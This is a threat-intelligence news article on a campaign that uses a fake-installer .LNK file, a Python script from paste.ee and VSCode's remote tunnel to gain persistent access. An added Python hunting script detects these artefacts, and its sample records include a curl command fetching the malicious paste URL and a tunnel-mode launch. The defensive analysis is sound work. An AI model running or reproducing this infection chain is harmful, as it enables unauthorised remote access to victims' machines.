Cyble Research and Intelligence Lab (CRIL) researchers have uncovered a sophisticated campaign that starts with a suspicious .LNK file and uses Visual Studio Code (VSCode) to establish persistence and remote access – and installs the VSCode command line interface (CLI) if VSCode isn’t found on the victim machine.
The attack method “mirrors tactics previously observed in campaigns by the Stately Taurus Chinese APT group,” the researchers wrote, noting that they also found Chinese language elements in the campaign.
VSCode Campaign May Start with Social Engineering
The .LNK file that serves as the initial attack vector is “potentially delivered via spam emails,” the Cyble researchers noted. The .LNK file downloads a Python distribution package that is used to execute an obfuscated Python script retrieved from a paste site.
At the time Cyble published the research, the script had no detections on VirusTotal, making it difficult to identify through standard security tools.
The Python script establishes persistence by creating a scheduled task with system privileges and high priority, said the CRIL researchers. It checks to see if VSCode is installed on the victim’s machine, and downloads the standalone VSCode CLI if it’s not found.
The script then creates a remote tunnel using VSCode, sending an activation code to the threat actor that facilitates unauthorized remote access to the machine.
The Cyble researchers illustrated the infection chain in the graphic below:
Attack Starts with a .LNK File, Python Script
The .LNK file masquerades as an installer and displays a fake “Successful installation” message in Chinese. “However, in the background, it silently downloads additional components using the curl utility, including a Python distribution package named ‘python-3.12.5-embed-amd64.zip’,” they wrote.
The .LNK file then creates a directory at “%LOCALAPPDATA%\Microsoft\Python” and extracts the contents of the zip archive using tar.exe. It then downloads a malicious script from a paste.ee site via the URL “hxxps[:]//paste[.]ee/r/DQjrd/0” and saves it as “update.py” in the same location, where it is executed using “pythonw.exe” without showing a console window.
The script checks if VSCode is already installed on the system by looking for the directory at “%LOCALAPPDATA%\microsoft\VScode”. If the directory isn’t found, the script downloads the VSCode Command Line Interface (CLI) from a Microsoft source: “hxxps://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli[.]zip.” Once downloaded, the file is extracted, and the executable file “code.exe” is placed into the “%LOCALAPPDATA%\microsoft\VScode” directory.
A scheduled task named “MicrosoftHealthcareMonitorNode” ensures persistence and is designed to execute the “update.py” script using “pythonw.exe,” which runs without showing a console window so the malicious activity can stay hidden. It is scheduled to run every four hours for non-admin users beginning at 8:00 a.m. For admin users, the task is configured to trigger at logon, running with elevated SYSTEM privileges and high priority, “which grants it more control and less likelihood of being interrupted.”
The script then checks to see if “code.exe” is already running in the background by inspecting the output of the “tasklist” command. If not, it executes “code.exe” to log out of any active remote sessions. “This step is crucial for the TA, as it allows them to establish a fresh remote tunnel for future interactions with the victim’s system,” the researchers wrote.
Once communication is established, exfiltration steps can then begin.
Cyble Recommendations
Cyble researchers said the campaign “demonstrates the growing sophistication of TAs in leveraging legitimate tools like VSCode to establish unauthorized access to victim systems. By utilizing a seemingly harmless .LNK file and an obfuscated Python script, the Threat Actor can effectively bypass detection measures.”
Cyble’s recommendations include:
- Advanced endpoint security solutions that use behavioral analysis and machine learning capabilities
- Reviewing scheduled tasks on all systems regularly
- Limiting user software installation permissions
- Deploying advanced monitoring tools that can detect unusual network traffic, unauthorized access attempts, and abnormal behavior
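A hunt for the artefacts described above (the task name, the staging directories under %LOCALAPPDATA%, console-less pythonw.exe running update.py, and the VSCode CLI started in tunnel mode), written as an added example that is not Cyble's code; the record layout (dicts standing in for process-creation events and scheduled-task exports) is assumed, and the sample records are constructed.

```python
import re

# Indicators quoted from the write-up; the dict shapes stand in for Sysmon EID 1 / task exports (assumed).
TASK_NAME = "MicrosoftHealthcareMonitorNode"
STAGING = re.compile(r"(%localappdata%|\\appdata\\local)\\microsoft\\(python|vscode)\\", re.I)
PASTE = re.compile(r"paste\.ee/r/", re.I)

def flag_process(ev):
    """Reasons a process-creation record matches the chain (empty list = clean)."""
    image, cmd = ev.get("image", "").lower(), ev.get("cmdline", "")
    hits = []
    if image.endswith("curl.exe") and (PASTE.search(cmd) or "python-3.12.5-embed-amd64.zip" in cmd):
        hits.append("curl pulling the paste.ee script or the embedded-Python zip")
    if image.endswith("pythonw.exe") and STAGING.search(cmd) and "update.py" in cmd.lower():
        hits.append("console-less pythonw.exe running update.py from the staging dir")
    if image.endswith("code.exe") and STAGING.search(image):
        hits.append("VSCode CLI under %LOCALAPPDATA%\\microsoft\\VScode, not a normal install path")
        if re.search(r"\btunnel\b", cmd, re.I):  # 'code tunnel' is the CLI's remote-tunnel mode
            hits.append("code.exe started in tunnel mode (remote access)")
    return hits

def flag_task(task):
    """Reasons a scheduled-task record matches: known name, staging-dir action, SYSTEM run."""
    hits = ["task name matches the campaign"] if task.get("name") == TASK_NAME else []
    action = task.get("action", "")
    if "pythonw.exe" in action.lower() and STAGING.search(action):
        hits.append("task action launches pythonw.exe from the staging dir")
        if task.get("runas", "").upper() == "SYSTEM":
            hits.append("and runs as SYSTEM")
    return hits

def hunt(events, tasks):
    """Return [(kind, label, reasons)] for every record that matched at least once."""
    found = [("process", e["image"], r) for e in events if (r := flag_process(e))]
    return found + [("task", t["name"], r) for t in tasks if (r := flag_task(t))]

# Constructed sample records: three stages of the chain plus two benign look-alikes.
LOCAL = r"C:\Users\alice\AppData\Local"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\curl.exe", "cmdline": "curl -o update.py https://paste.ee/r/DQjrd/0"},
    {"image": LOCAL + r"\Microsoft\Python\pythonw.exe", "cmdline": LOCAL + r"\Microsoft\Python\pythonw.exe " + LOCAL + r"\Microsoft\Python\update.py"},
    {"image": LOCAL + r"\microsoft\VScode\code.exe", "cmdline": "code.exe tunnel"},
    {"image": LOCAL + r"\Programs\Microsoft VS Code\Code.exe", "cmdline": "Code.exe C:\\proj"},  # real install
    {"image": r"C:\Python312\pythonw.exe", "cmdline": "pythonw.exe backup.py"},
]
SAMPLE_TASKS = [
    {"name": TASK_NAME, "action": r"%LOCALAPPDATA%\Microsoft\Python\pythonw.exe %LOCALAPPDATA%\Microsoft\Python\update.py", "runas": "SYSTEM"},
    {"name": "OneDrive Reporting Task", "action": r"%LOCALAPPDATA%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe", "runas": "alice"},
]
```

Running `hunt(SAMPLE_EVENTS, SAMPLE_TASKS)` flags the curl download, the hidden pythonw.exe, the tunnel-mode code.exe and the SYSTEM-level task while leaving the regular VSCode install and the unrelated pythonw.exe and OneDrive task untouched.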
The Cyble blog also covers MITRE ATT&CK techniques, indicators of compromise (IoCs) and more.